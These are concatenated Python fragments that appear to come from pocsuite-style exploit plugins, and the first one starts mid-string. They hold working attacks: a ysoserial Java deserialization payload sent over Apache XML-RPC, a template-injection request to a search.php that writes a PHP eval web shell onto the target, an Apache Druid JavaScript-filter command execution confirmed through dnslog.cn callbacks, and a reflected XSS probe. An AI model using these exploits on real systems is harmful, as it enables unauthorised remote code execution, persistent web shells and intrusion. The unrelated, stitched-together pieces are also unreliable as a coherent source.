EADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14' #input your payload encoded by ysoserial pocxml = '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">' + payload + '</serializable></value></member></struct></value></param></params></methodCall>' try: r2 = requests.post(url=pocurl, headers=headers, data=pocxml, verify=False) if r2.status_code == 200 and 'XML-RPC' in r2.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['extra'] = {} result['extra']['evidence'] = r2.text except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _attack(self): result = {} random_string = random_str(16) verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'<?php @eval($_POST[sma11stu]);?>" + random_string + "')&func=assert" veri_url = urljoin(self.url, '/search.php') shell_url = urljoin(self.url, '/' + random_string + '.php') headers = { "Content-Type": "application/x-www-form-urlencoded;charset=utf-8", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", } try: resp = requests.post(veri_url,data=verify_payload,headers=headers) time.sleep(1) resp_1 = requests.get(shell_url,headers=headers) if (random_string in resp_1.text) and resp_1.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php') result['VerifyInfo']['Shell_pass'] = "******" except Exception as e: logger.warn(str(e)) return self.parse_output(result)
def _verify(self): result = {} getdnssub_url = 'http://www.dnslog.cn/getdomain.php' getres_url = 'http://www.dnslog.cn/getrecords.php' dnsheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64' } dnssess = requests.session() #获取dnslog的subdomain try: dnsreq = dnssess.get(url=getdnssub_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) except Exception as e: logger.warn(str(e)) #执行ping dnslog的请求 pocurl = self.url + '/druid/indexer/v1/sampler?for=filter' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } payload = 'ping catchyou.' + dnsreq.text pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 time.sleep(5) except Exception as e: logger.warn(str(e)) #检查dnslog日志 try: dnsres = dnssess.get(url=getres_url, headers=dnsheaders, allow_redirects=False, verify=False, timeout=10) if dnsres.status_code == 200 and 'catchyou' in dnsres.text: result['VerifyInfo'] = {} # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port) result['VerifyInfo']['URL'] = self.url result['extra'] = {} result['extra']['evidence'] = dnsres.text except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _verify(self): result = {} xss_payload = "<script>alert()</script>" verify_payload = "ad_js.php?ad_id=" + xss_payload logger.warn(verify_payload) veri_url = urljoin(self.url,verify_payload) logger.warn(veri_url) headers = { "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", } try: resp = requests.get(veri_url,headers=headers) if xss_payload in resp.text and resp.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = veri_url result['VerifyInfo']['Payload'] = verify_payload except Exception as e: logger.warn(str(e)) return self.parse_output(result)